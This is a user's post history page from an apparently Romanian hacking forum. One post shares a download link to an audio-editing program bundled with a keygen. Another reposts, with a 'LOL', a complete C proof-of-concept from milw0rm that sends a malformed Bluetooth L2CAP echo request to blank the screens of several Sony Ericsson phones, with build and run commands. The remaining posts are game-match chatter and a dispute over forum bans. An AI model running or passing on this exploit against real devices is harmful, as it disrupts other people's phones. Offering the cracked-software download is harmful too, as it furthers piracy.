Jump to content

phantomas

Active Members
  • Posts

    171
  • Joined

  • Last visited

Posts posted by phantomas

  1. MP3 Cutter Joiner is a powerful and easy-to-use audio editor, which builds audio cutter and joiner into one. Supports MP3, WAV, WMA and OGG format. You can cut a new small file from a large audio file, and you can also merge multiple files to a large new one. Supports batch cutting. With a small audio player built in, you can set the cutting/joining's start-time/end-time just when pre-listening to the song. Cutting/joining in high precision and no quality is lost! What's more, you can complete cutting and joining in just one command. In other words, if you have several files and want to cut a part from every song and then merge those parts into one file, all you need to do is just setting the start-time and end-time for every part and then click "Join" button.

    E foarte usor de folosit , il puteti folosi cei care au telefoane cu mp3 si numai aveti destul spatiu , taieti o mel si puneti ce va place sper sa fie de folos pt unii ;) enjoy ( keygen inclus )

    Download : http://rapidshare.de/files/28489030/Instal...keygen.rar.html

    untitled.jpg

  2. LOL !!! ( luat de pe milworm )

    /* Sony/Ericsson reset display - PoC */

    /* Pierre BETOUIN - [email]pierre.betouin@infratech.fr[/email] */

    /* 05-02-2006 */

    /* Vulnerability found using BSS fuzzer : */

    /* Download [url]www.secuobs.com/news/05022006-bluetooth10.shml[/url] */

    /* */

    /* Causes anormal behaviours on some Sony/Ericsson */

    /* cell phones */

    /* Vulnerable tested devices : */

    /* - K600i */

    /* - V600i */

    /* - K750i */

    /* - W800i */

    /* - And maybe other ones... */

    /* */

    /* Vulnerable devices will slowly turn their screen into */

    /* black and then display a white screen. */

    /* After a short period (~45sec), they will go back to */

    /* their normal behaviour */

    /* */

    /* gcc -lbluetooth reset_display_sonyericsson.c */

    /* -o reset_display_sonyericsson */

    /* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */



    #include <stdio.h>

    #include <stdlib.h>

    #include <unistd.h>

    #include <sys/types.h>

    #include <sys/socket.h>

    #include <bluetooth/bluetooth.h>

    #include <bluetooth/hci.h>

    #include <bluetooth/l2cap.h>



    #define SIZE 4

    #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)



    int main(int argc, char **argv)

    {

    char *buffer;

    l2cap_cmd_hdr *cmd;

    struct sockaddr_l2 addr;

    int sock, sent, i;



    if(argc < 2)

    {

    fprintf(stderr, "%s <btaddr>n", argv[0]);

    exit(EXIT_FAILURE);

    }



    if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)

    {

    perror("socket");

    exit(EXIT_FAILURE);

    }



    memset(&addr, 0, sizeof(addr));

    addr.l2_family = AF_BLUETOOTH;



    if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)

    {

    perror("bind");

    exit(EXIT_FAILURE);

    }



    str2ba(argv[1], &addr.l2_bdaddr);



    if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)

    {

    perror("connect");

    exit(EXIT_FAILURE);

    }



    if(!(buffer = (char *) malloc ((int) SIZE + 1)))

    {

    perror("malloc");

    exit(EXIT_FAILURE);

    }



    memset(buffer, 90, SIZE);



    cmd = (l2cap_cmd_hdr *) buffer;

    cmd->code = L2CAP_ECHO_REQ;

    cmd->ident = 1;

    cmd->len = FAKE_SIZE;



    if( (sent=send(sock, buffer, SIZE, 0)) >= 0)

    {

    printf("L2CAP packet sent (%d)n", sent);

    }



    printf("Buffer:t");

    for(i=0; i<sent; i++)

    printf("%.2X ", (unsigned char) buffer[i]);

    printf("n");



    free(buffer);

    close(sock);

    return EXIT_SUCCESS;

    }



    // milw0rm.com [2006-02-06]







    sper sa fie de folos

  3. <div class='quotetop'>QUOTE("zbeng")</div>

    si cum va fi meciul 6 si 5  ca daca suntem 11:(

    da nui nici o problema , tot ala care are scoru mai mic iese ;) nui nici o diferenta daca stai sa te gandesti , si zic eu ca vom juca 2 harti ( 1- de_dust2 , 2- fy_snow sau fy_dustworld ) asta depinde daca vor fiecare asa , astept raspunsu vostru ;)

  4. <div class='quotetop'>QUOTE("Sad_Dreamer")</div>

    dar tie tie lene sa cauti? sa caut eu pentru tine sau ce?

    PS:ar trebui banati nu numai userii cu 0 posturi ci si cei care nu au nici o treaba cu hackingul/programarea...le e lene sa caute ceva ce se gaseste imediat

    Sorry man cei care nu au treaba cu hackingul/programare nu o sa fie banati nici in visele tale , dupa cate stiu forumul e facut sa ajute si sa invete lumea sa faca hacking/programare , normal mai sunt cativa ca tine care se cred hackeri...dar in fine...

×
×
  • Create New...